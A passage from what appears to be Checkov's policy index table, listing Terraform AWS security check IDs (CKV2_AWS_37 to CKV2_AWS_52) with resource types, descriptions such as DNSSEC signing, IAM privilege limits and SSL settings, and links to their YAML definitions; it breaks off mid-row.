[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1071 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1072 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1073 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1074 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1075 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1076 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1077 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1078 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1079 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1080 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1081 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1082 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1083 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1084 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1085 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1086 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1087 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1088 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1089 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1090 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1091 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1092 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1093 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1094 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1095 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1096 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1097 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1098 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1099 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1100 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1101 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1102 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1103 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1104 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1105 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1106 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1107 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1108 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1109 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1110 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1111 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1112 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1113 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1114 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1115 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1116 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1117 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1118 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1119 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1120 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1121 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1122 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1123 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1124 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1125 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1126 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1127 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1128 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1129 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1130 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1131 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1132 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1133 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1134 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1135 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1136 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1137 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1138 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1139 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1140 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1141 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1142 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1143 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1144 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1145 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1146 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | -| 1147 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | -| 1148 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1149 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1150 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1151 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1152 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1153 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1154 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | -| 1155 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | -| 1156 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | -| 1157 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1158 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1159 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1160 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1161 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | -| 1162 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1163 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1164 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | -| 1165 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | -| 1166 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | -| 1167 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1168 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1169 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1170 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1171 | CKV2_AWS_52 | resource | aws_opensearch_domain | 